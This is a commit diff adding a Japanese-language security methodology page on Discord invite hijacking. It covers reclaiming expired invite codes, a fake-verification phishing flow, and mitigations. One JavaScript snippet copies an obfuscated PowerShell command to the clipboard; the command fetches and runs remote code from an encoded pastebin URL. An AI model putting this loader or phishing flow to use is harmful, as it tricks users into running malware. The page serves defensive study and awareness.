Translated ['src/generic-methodologies-and-resources/phishing-methodolog

This commit is contained in:
Translator 2025-07-08 19:26:27 +00:00
parent ebc0147931
commit aa0cc8cf54
2 changed files with 62 additions and 0 deletions

View File

@ -29,6 +29,7 @@
- [Phishing Methodology](generic-methodologies-and-resources/phishing-methodology/README.md)
- [Clone a Website](generic-methodologies-and-resources/phishing-methodology/clone-a-website.md)
- [Detecting Phishing](generic-methodologies-and-resources/phishing-methodology/detecting-phising.md)
- [Discord Invite Hijacking](generic-methodologies-and-resources/phishing-methodology/discord-invite-hijacking.md)
- [Phishing Files & Documents](generic-methodologies-and-resources/phishing-methodology/phishing-documents.md)
- [Basic Forensic Methodology](generic-methodologies-and-resources/basic-forensic-methodology/README.md)
- [Baseline Monitoring](generic-methodologies-and-resources/basic-forensic-methodology/file-integrity-monitoring.md)

View File

@ -0,0 +1,61 @@
# Discord Invite Hijacking
{{#include ../../banners/hacktricks-training.md}}
Discordの招待システムの脆弱性により、脅威アクターは期限切れまたは削除された招待コード一時的、永久的、またはカスタムバニティを新しいバニティリンクとして主にレベル3ブーストされたサーバーで主張することができます。すべてのコードを小文字に正規化することで、攻撃者は既知の招待コードを事前に登録し、元のリンクが期限切れになるか、ソースサーバーがブーストを失うと静かにトラフィックをハイジャックできます。
## 招待タイプとハイジャックリスク
| 招待タイプ | ハイジャック可能? | 条件 / コメント |
|-----------------------|-------------|------------------------------------------------------------------------------------------------------------|
| 一時的招待リンク | ✅ | 期限切れ後、コードは利用可能になり、ブーストされたサーバーによってバニティURLとして再登録される可能性があります。 |
| 永久的招待リンク | ⚠️ | 削除され、小文字の文字と数字のみで構成されている場合、コードは再び利用可能になる可能性があります。 |
| カスタムバニティリンク | ✅ | 元のサーバーがレベル3ブーストを失うと、そのバニティ招待は新しい登録のために利用可能になります。 |
## 悪用手順
1. 偵察
- 公共のソースフォーラム、ソーシャルメディア、Telegramチャンネル`discord.gg/{code}`または`discord.com/invite/{code}`のパターンに一致する招待リンクを監視します。
- 興味のある招待コード(一時的またはバニティ)を収集します。
2. 事前登録
- レベル3ブースト特権を持つDiscordサーバーを作成するか、既存のサーバーを使用します。
- **サーバー設定 → バニティURL**で、ターゲット招待コードを割り当てようとします。受け入れられた場合、そのコードは悪意のあるサーバーによって予約されます。
3. ハイジャックのアクティベーション
- 一時的招待の場合、元の招待が期限切れになるまで待ちます(または、ソースを制御している場合は手動で削除します)。
- 大文字を含むコードの場合、小文字のバリアントはすぐに主張できますが、リダイレクトは期限切れ後にのみアクティブになります。
4. 静かなリダイレクション
- ハイジャックがアクティブになると、古いリンクを訪れるユーザーは攻撃者が制御するサーバーにシームレスに送信されます。
## Discordサーバーを介したフィッシングフロー
1. サーバーチャンネルを制限し、**#verify**チャンネルのみが表示されるようにします。
2. ボット(例:**Safeguard#0786**を展開し、新規参加者にOAuth2を介して確認するよう促します。
3. ボットはユーザーをフィッシングサイト(例:`captchaguard.me`にリダイレクトし、CAPTCHAまたは確認ステップのふりをします。
4. **ClickFix** UXトリックを実装します
- 壊れたCAPTCHAメッセージを表示します。
- ユーザーに**Win+R**ダイアログを開き、事前にロードされたPowerShellコマンドを貼り付けてEnterを押すように誘導します。
### ClickFixクリップボードインジェクションの例
```javascript
// Copy malicious PowerShell command to clipboard
const cmd = `powershell -NoExit -Command "$r='NJjeywEMXp3L3Fmcv02bj5ibpJWZ0NXYw9yL6MHc0RHa';` +
`$u=($r[-1..-($r.Length)]-join '');` +
`$url=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($u));` +
`iex (iwr -Uri $url)"`;
navigator.clipboard.writeText(cmd);
```
このアプローチは、直接的なファイルダウンロードを避け、ユーザーの疑念を下げるために馴染みのあるUI要素を活用します。
## 緩和策
- 少なくとも1つの大文字または非英数字を含む永久的な招待リンクを使用する期限切れにならず、再利用不可
- 定期的に招待コードをローテーションし、古いリンクを無効にする。
- Discordサーバーのブースト状況とバニティURLの主張を監視する。
- ユーザーにサーバーの信頼性を確認し、クリップボードから貼り付けたコマンドを実行しないよう教育する。
## 参考文献
- From Trust to Threat: Hijacked Discord Invites Used for Multi-Stage Malware Delivery https://research.checkpoint.com/2025/from-trust-to-threat-hijacked-discord-invites-used-for-multi-stage-malware-delivery/
- Discord Custom Invite Link Documentation https://support.discord.com/hc/en-us/articles/115001542132-Custom-Invite-Link
{{#include /banners/hacktricks-training.md}}